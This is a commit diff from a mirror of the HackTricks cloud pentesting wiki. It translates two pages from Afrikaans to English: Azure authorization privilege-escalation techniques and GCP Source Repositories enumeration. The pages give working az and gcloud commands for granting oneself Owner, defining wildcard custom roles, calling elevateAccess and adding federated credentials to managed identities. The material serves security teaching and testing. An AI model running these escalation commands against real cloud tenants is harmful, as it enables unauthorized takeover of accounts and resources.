gitea-mirror/hacktricks-cloud
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks-cloud.git synced 2025-12-27 05:03:31 -08:00
Code Issues Packages Projects Releases Wiki Activity

Translated ['src/pentesting-cloud/azure-security/az-privilege-escalation

Browse Source
This commit is contained in:
Translator
2025-01-09 01:06:27 +00:00
parent b7f6ca304c
commit 9266129663
2 changed files with 61 additions and 44 deletions
Download Patch File Download Diff File Expand all files Collapse all files

58
src/pentesting-cloud/azure-security/az-privilege-escalation/az-authorization-privesc.md
View File

@@ -4,7 +4,7 @@
## Azure IAM
Vir meer inligting, kyk:
Fore more information check:
{{#ref}}
../az-services/az-azuread.md
@@ -12,38 +12,45 @@ Vir meer inligting, kyk:
### Microsoft.Authorization/roleAssignments/write
Hierdie toestemming laat toe om rolle aan principals oor 'n spesifieke omvang toe te ken, wat 'n aanvaller in staat stel om voorregte te verhoog deur homself 'n meer voorregte rol toe te ken:
This permission allows to assign roles to principals over a specific scope, allowing an attacker to escalate privileges by assigning himself a more privileged role:
```bash
# Example
az role assignment create --role Owner --assignee "24efe8cf-c59e-45c2-a5c7-c7e552a07170" --scope "/subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/Resource_Group_1/providers/Microsoft.KeyVault/vaults/testing-1231234"
```
### Microsoft.Authorization/roleDefinitions/Write
Hierdie toestemming laat toe om die toestemmings wat deur 'n rol toegeken is, te wysig, wat 'n aanvaller in staat stel om voorregte te verhoog deur meer toestemmings aan 'n rol wat hy toegeken het, toe te ken.
This permission allows to modify the permissions granted by a role, allowing an attacker to escalate privileges by granting more permissions to a role he has assigned.
Create the file `role.json` with the following **content**:
Skep die lêer `role.json` met die volgende **inhoud**:
```json
{
"Name": "<name of the role>",
"IsCustom": true,
"Description": "Custom role with elevated privileges",
"Actions": ["*"],
"NotActions": [],
"DataActions": ["*"],
"NotDataActions": [],
"AssignableScopes": ["/subscriptions/<subscription-id>"]
"Name": "<name of the role>",
"IsCustom": true,
"Description": "Custom role with elevated privileges",
"Actions": ["*"],
"NotActions": [],
"DataActions": ["*"],
"NotDataActions": [],
"AssignableScopes": ["/subscriptions/<subscription-id>"]
}
```
Dan werk die roltoestemmings op met die vorige definisie wat noem:
Then update the role permissions with the previous definition calling:
```bash
az role definition update --role-definition role.json
```
### Microsoft.Authorization/elevateAccess/action
Hierdie toestemmings laat toe om voorregte te verhoog en in staat te wees om toestemmings aan enige hoofpersoon toe te ken vir Azure hulpbronne. Dit is bedoel om aan Entra ID Global Administrators gegee te word sodat hulle ook toestemmings oor Azure hulpbronne kan bestuur.
This permissions allows to elevate privileges and be able to assign permissions to any principal to Azure resources. It's meant to be given to Entra ID Global Administrators so they can also manage permissions over Azure resources.
> [!TIP]
> Ek dink die gebruiker moet 'n Global Administrator in Entra ID wees vir die verhoog oproep om te werk.
> I think the user need to be Global Administrator in Entrad ID for the elevate call to work.
```bash
# Call elevate
az rest --method POST --uri "https://management.azure.com/providers/Microsoft.Authorization/elevateAccess?api-version=2016-07-01"
@@ -51,22 +58,27 @@ az rest --method POST --uri "https://management.azure.com/providers/Microsoft.Au
# Grant a user the Owner role
az role assignment create --assignee "<obeject-id>" --role "Owner" --scope "/"
```
### Microsoft.ManagedIdentity/userAssignedIdentities/federatedIdentityCredentials/write
Hierdie toestemming laat toe om Federated kredensiale by bestuurde identiteite te voeg. Byvoorbeeld, gee toegang tot Github Actions in 'n repo aan 'n bestuurde identiteit. Dan laat dit toe om **toegang te verkry tot enige gebruiker gedefinieerde bestuurde identiteit**.
This permission allows to add Federated credentials to managed identities. E.g. give access to Github Actions in a repo to a managed identity. Then, it allows to **access any user defined managed identity**.
Example command to give access to a repo in Github to the a managed identity:
Voorbeeldopdrag om toegang tot 'n repo in Github aan 'n bestuurde identiteit te gee:
```bash
# Generic example:
az rest --method PUT \
--uri "https://management.azure.com//subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.ManagedIdentity/userAssignedIdentities/<managed-identity-name>/federatedIdentityCredentials/<name-new-federated-creds>?api-version=2023-01-31" \
--headers "Content-Type=application/json" \
--body '{"properties":{"issuer":"https://token.actions.githubusercontent.com","subject":"repo:<org-name>/<repo-name>:ref:refs/heads/<branch-name>","audiences":["api://AzureADTokenExchange"]}}'
--uri "https://management.azure.com//subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.ManagedIdentity/userAssignedIdentities/<managed-identity-name>/federatedIdentityCredentials/<name-new-federated-creds>?api-version=2023-01-31" \
--headers "Content-Type=application/json" \
--body '{"properties":{"issuer":"https://token.actions.githubusercontent.com","subject":"repo:<org-name>/<repo-name>:ref:refs/heads/<branch-name>","audiences":["api://AzureADTokenExchange"]}}'
# Example with specific data:
az rest --method PUT \
--uri "https://management.azure.com//subscriptions/92913047-10a6-2376-82a4-6f04b2d03798/resourceGroups/Resource_Group_1/providers/Microsoft.ManagedIdentity/userAssignedIdentities/funcGithub-id-913c/federatedIdentityCredentials/CustomGH2?api-version=2023-01-31" \
--headers "Content-Type=application/json" \
--body '{"properties":{"issuer":"https://token.actions.githubusercontent.com","subject":"repo:carlospolop/azure_func4:ref:refs/heads/main","audiences":["api://AzureADTokenExchange"]}}'
--uri "https://management.azure.com//subscriptions/92913047-10a6-2376-82a4-6f04b2d03798/resourceGroups/Resource_Group_1/providers/Microsoft.ManagedIdentity/userAssignedIdentities/funcGithub-id-913c/federatedIdentityCredentials/CustomGH2?api-version=2023-01-31" \
--headers "Content-Type=application/json" \
--body '{"properties":{"issuer":"https://token.actions.githubusercontent.com","subject":"repo:carlospolop/azure_func4:ref:refs/heads/main","audiences":["api://AzureADTokenExchange"]}}'
```
{{#include ../../../banners/hacktricks-training.md}}

47
src/pentesting-cloud/gcp-security/gcp-services/gcp-source-repositories-enum.md
View File

@@ -1,37 +1,38 @@
# GCP - Bronrepositories Enum
# GCP - Source Repositories Enum
{{#include ../../../banners/hacktricks-training.md}}
## Basiese Inligting <a href="#reviewing-cloud-git-repositories" id="reviewing-cloud-git-repositories"></a>
## Basic Information <a href="#reviewing-cloud-git-repositories" id="reviewing-cloud-git-repositories"></a>
Google Cloud Source Repositories is 'n volledig funksionele, skaalbare, **privaat Git-repositorydiens**. Dit is ontwerp om **jou bronnekode in 'n volledig bestuurde omgewing te huisves**, wat naatloos integreer met ander GCP-gereedskap en -dienste. Dit bied 'n samewerkende en veilige plek vir spanne om hul kode te stoor, te bestuur en te volg.
Google Cloud Source Repositories is a fully-featured, scalable, **private Git repository service**. It's designed to **host your source code in a fully managed environment**, integrating seamlessly with other GCP tools and services. It offers a collaborative and secure place for teams to store, manage, and track their code.
Belangrike kenmerke van Cloud Source Repositories sluit in:
Key features of Cloud Source Repositories include:
1. **Volledig Bestuurde Git Hosting**: Bied die bekende funksionaliteit van Git, wat beteken dat jy gewone Git-opdragte en werkvloei kan gebruik.
2. **Integrasie met GCP Dienste**: Integreer met ander GCP-dienste soos Cloud Build, Pub/Sub, en App Engine vir end-to-end opspoorbaarheid van kode tot implementering.
3. **Privaat Repositories**: Verseker dat jou kode veilig en privaat gestoor word. Jy kan toegang beheer met behulp van Cloud Identity and Access Management (IAM) rolle.
4. **Bronkode Analise**: Werk saam met ander GCP-gereedskap om geoutomatiseerde analise van jou bronnekode te bied, wat potensiële probleme soos foute, kwesbaarhede, of slegte koderingpraktyke identifiseer.
5. **Samewerkingsgereedskap**: Ondersteun samewerkende kodering met gereedskap soos samesmeltingsversoeke, kommentaar, en hersienings.
6. **Spieëlondersteuning**: Laat jou toe om Cloud Source Repositories met repositories wat op GitHub of Bitbucket gehos is, te verbind, wat outomatiese sinkronisasie moontlik maak en 'n verenigde weergawe van al jou repositories bied.
1. **Fully Managed Git Hosting**: Offers the familiar functionality of Git, meaning you can use regular Git commands and workflows.
2. **Integration with GCP Services**: Integrates with other GCP services like Cloud Build, Pub/Sub, and App Engine for end-to-end traceability from code to deployment.
3. **Private Repositories**: Ensures your code is stored securely and privately. You can control access using Cloud Identity and Access Management (IAM) roles.
4. **Source Code Analysis**: Works with other GCP tools to provide automated analysis of your source code, identifying potential issues like bugs, vulnerabilities, or bad coding practices.
5. **Collaboration Tools**: Supports collaborative coding with tools like merge requests, comments, and reviews.
6. **Mirror Support**: Allows you to connect Cloud Source Repositories with repositories hosted on GitHub or Bitbucket, enabling automatic synchronization and providing a unified view of all your repositories.
### OffSec inligting <a href="#reviewing-cloud-git-repositories" id="reviewing-cloud-git-repositories"></a>
### OffSec information <a href="#reviewing-cloud-git-repositories" id="reviewing-cloud-git-repositories"></a>
- Die bronrepositories-konfigurasie binne 'n projek sal 'n **Dienrekening** hê wat gebruik word om Cloud Pub/Sub-boodskappe te publiseer. Die standaard een wat gebruik word, is die **Compute SA**. egter, **ek dink nie dit is moontlik om sy token te steel** van Source Repositories nie, aangesien dit in die agtergrond uitgevoer word.
- Om die kode binne die GCP Cloud Source Repositories-webkonsol te sien ([https://source.cloud.google.com/](https://source.cloud.google.com/)), moet die kode **binne die hooftak wees per standaard**.
- Jy kan ook 'n **spieël Cloud Repository** skep wat na 'n repo van **Github** of **Bitbucket** wys (toegang aan daardie platforms gee).
- Dit is moontlik om **kode & debugg te doen van binne GCP**.
- Per standaard, **verhoed Source Repositories dat privaat sleutels in verbintenisse gepush word**, maar dit kan gedeaktiveer word.
- The source repositories configuration inside a project will have a **Service Account** used to publishing Cloud Pub/Sub messages. The default one used is the **Compute SA**. However, **I don't think it's possible steal its token** from Source Repositories as it's being executed in the background.
- To see the code inside the GCP Cloud Source Repositories web console ([https://source.cloud.google.com/](https://source.cloud.google.com/)), you need the code to be **inside master branch by default**.
- You can also **create a mirror Cloud Repository** pointing to a repo from **Github** or **Bitbucket** (giving access to those platforms).
- It's possible to **code & debug from inside GCP**.
- By default, Source Repositories **prevents private keys to be pushed in commits**, but this can be disabled.
### Open In Cloud Shell
Dit is moontlik om die repository in Cloud Shell te open, 'n prompt soos hierdie sal verskyn:
It's possible to open the repository in Cloud Shell, a prompt like this one will appear:
<figure><img src="../../../images/image (325).png" alt=""><figcaption></figcaption></figure>
Dit sal jou toelaat om te kodeer en te debugg in Cloud Shell (wat cloudshell gecompromitteer kan maak).
This will allow you to code and debug in Cloud Shell (which could get cloudshell compromised).
### Enumeration
### Enumerasie
```bash
# Repos enumeration
gcloud source repos list #Get names and URLs
@@ -42,7 +43,7 @@ gcloud source repos get-iam-policy <repo_name>
gcloud source repos clone <REPO NAME>
gcloud source repos get-iam-policy <REPO NAME>
... git add & git commit -m ...
git push --set-upstream origin master
git push --set-upstream origin $BRANCH
git push -u origin master
# Access via git
@@ -50,16 +51,20 @@ git push -u origin master
git clone ssh://username@domain.com@source.developers.google.com:2022/p/<proj-name>/r/<repo-name>
git add, commit, push...
```
### Privilege Escalation & Post Exploitation
{{#ref}}
../gcp-privilege-escalation/gcp-sourcerepos-privesc.md
{{#endref}}
### Ongeauthentiseerde Enum
### Unauthenticated Enum
{{#ref}}
../gcp-unauthenticated-enum-and-access/gcp-source-repositories-unauthenticated-enum.md
{{#endref}}
{{#include ../../../banners/hacktricks-training.md}}